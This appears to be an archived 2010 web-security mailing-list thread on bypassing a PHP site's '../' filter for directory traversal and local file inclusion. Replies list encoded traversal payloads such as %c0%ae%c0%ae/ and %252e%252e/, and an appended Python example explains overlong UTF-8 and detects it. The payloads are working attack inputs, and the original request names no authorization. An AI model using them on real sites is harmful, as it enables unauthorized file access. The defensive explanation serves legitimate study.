[WEB SECURITY] ../ filtered

NeZa neza0x at gmail.com
Mon Feb 22 15:51:40 EST 2010


Hey Shlomi, excellent tips, but wondering if you have written about how to
convert from hex to UTF-8, in order to create my own tests.
I mean, as you know, %2e can be UTF-8 converted to:

C0 AE (11000000 10101110)

E0 80 AE (11100000 10000000 10101110)

F0 80 80 AE (11110000 10000000 10000000 10101110)

F8 80 80 80 AE (11111000 10000000 10000000 10000000 10101110)

FC 80 80 80 80 AE (11111100 10000000 10000000 10000000 10000000 10101110)

But I do not understand how it was converted from %2e to %C0 %AE and others.

Any documentation?

On Mon, Feb 22, 2010 at 3:51 AM, Shlomi Narkolayev <shlominar at gmail.com> wrote:

> If ".." is rejected, try these:
> %c0%ae%c0%ae\FILENAME
> %uff0e%uff0e/FILENAME
> %c0%ae%c0%ae/FILENAME
> %2e%2e%5cFILENAME
> %2e%2e\%2e%2e\FILENAME
> %2e%2e%2fFILENAME
>
> If you still need more combinations, check my blog <http://narkolayev-shlomi.blogspot.com/> in a few days for the full list.
>
> Kind Regards,
> Narkolayev Shlomi.
>
> *From:* Beatriz Duran [mailto:beatrizdrn at yahoo.com]
> *Sent:* Tuesday, February 16, 2010 4:40 PM
>
> *To:* Shlomi Narkolayev; websecurity at webappsec.org
> *Subject:* Re: [WEB SECURITY] ../ filtered
>
> Shlomi,
>
> I tried those already, but they and the ones with ".." are rejected: the
> variable is verifying the string before running it. With the combination
>
> %252e%252e/FILENAME this happens:
>
> viewfiles.php?folder=%252e%252e/
>
> The 25s are removed, so the %2e%2e are left but transformed into pure
> text, so the page reports that the directory %2e%2e doesn't exist; but if I
> apply purely viewfiles.php?folder=%2e%2e/ the page rejects them and says ..
> is not allowed.
>
> I Have Learned So much from God That I can no longer Call Myself A
> Christian, a Hindu, a Muslim A Buddhist, a Jew. The Truth has shared so much
> of Itself With me That I can no longer call myself A man, a woman, and angel
> Or even pure Soul. Love has Befriended Hafiz so completely It has turned to
> ash And freed Me Of every concept and image My mind has ever known. –Hafiz,
> Persian poet (1315 – 1390)
>
>  ------------------------------
>
> *From:* Shlomi Narkolayev <shlominar at gmail.com>
> *To:* beatrizdrn at yahoo.com; websecurity at webappsec.org
> *Sent:* Tue, February 16, 2010 12:41:16 AM
> *Subject:* RE: [WEB SECURITY] ../ filtered
>
> Try these:
> ..%5c..%5cFILENAME
> %2e%2e\%2e%2e\FILENAME
> ..%c0%af..%c0%afFILENAME
> ..%255c..%255cFILENAME
> %252e%252e/FILENAME
> ..%2f..%2fFILENAME
> ..%252f..%252fFILENAME
>
>
> Soon I'll upload to my blog <http://narkolayev-shlomi.blogspot.com/> 1400
> new variants for directory traversal.
>
> Kind Regards,
> Narkolayev Shlomi.
>
> *From:* Beatriz Duran [mailto:beatrizdrn at yahoo.com]
> *Sent:* Monday, February 15, 2010 9:43 AM
> *To:* websecurity at webappsec.org
> *Subject:* [WEB SECURITY] ../ filtered
>
> Hi, I need to find a vulnerability in a URL that could be exploited for
> directory traversal and LFI; the page is working with PHP but it is
> filtering /../ and also /%2e%2e/. Because the page is using ISO for Latin
> characters I can't use extended Unicode, because it reinterprets it with other
> values; is there another way to work around the filter?
>


-- 
NeZa
Hacker Wanna Be from Nezahualcoyotl
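For NeZa's question above on how %2e turns into C0 AE and the longer rows, here is an added example in Python (mine, not from the thread or from Shlomi's list): `utf8_form` packs a code point into a chosen number of bytes using the UTF-8 bit layout, which is exactly how the overlong forms are produced, and `overlong_sequences` is the defender's side, flagging such sequences in a percent-encoded path like the ones quoted. The names `utf8_form`, `seq_len`, `is_overlong` and `overlong_sequences` are my own.

```python
from urllib.parse import unquote_to_bytes

# Upper limits for 1..6-byte forms (old RFC 2279 layout, covering the rows above).
LIMITS = (0x80, 0x800, 0x10000, 0x200000, 0x4000000, 0x80000000)


def utf8_form(cp: int, nbytes: int) -> bytes:
    """Pack cp into exactly nbytes: lead byte 11..0xxx + 10xxxxxx continuations."""
    if not 2 <= nbytes <= 6:
        raise ValueError("nbytes must be 2..6")
    cont = []
    for _ in range(nbytes - 1):          # low 6 bits fill each 10xxxxxx byte
        cont.append(0x80 | (cp & 0x3F))
        cp >>= 6
    if cp >> (7 - nbytes):               # lead byte holds the remaining bits
        raise ValueError("code point does not fit in nbytes")
    lead = ((0xFF << (8 - nbytes)) & 0xFF) | cp   # 0xC0 | 0 for %2e in 2 bytes
    return bytes([lead] + cont[::-1])


def seq_len(lead: int) -> int:
    """Length announced by a lead byte's run of 1-bits (1 for ASCII or junk)."""
    for n in range(2, 7):
        if (lead & ((0xFF << (7 - n)) & 0xFF)) == ((0xFF << (8 - n)) & 0xFF):
            return n
    return 1


def is_overlong(seq: bytes) -> bool:
    """True if seq is one multi-byte sequence whose value fits in fewer bytes."""
    n = len(seq)
    if n < 2 or seq_len(seq[0]) != n or any(b & 0xC0 != 0x80 for b in seq[1:]):
        return False
    cp = seq[0] & ((1 << (7 - n)) - 1)  # payload bits left in the lead byte
    for b in seq[1:]:
        cp = (cp << 6) | (b & 0x3F)
    return n > next(k for k, limit in enumerate(LIMITS, 1) if cp < limit)


def overlong_sequences(encoded_path: str) -> list[str]:
    """Percent-decode a path such as '%c0%ae%c0%ae/' and list each overlong
    sequence as hex; a strict UTF-8 decoder rejects these outright."""
    data, found, i = unquote_to_bytes(encoded_path), [], 0
    while i < len(data):
        n = seq_len(data[i])
        if n > 1 and is_overlong(data[i:i + n]):
            found.append(data[i:i + n].hex())
        i += n
    return found
```

Python's own decoder already treats every one of these as an error (`b'\xc0\xae'.decode('utf-8')` raises UnicodeDecodeError), which is why a filter should decode the input to one canonical form before looking for "..", rather than pattern-matching the raw bytes.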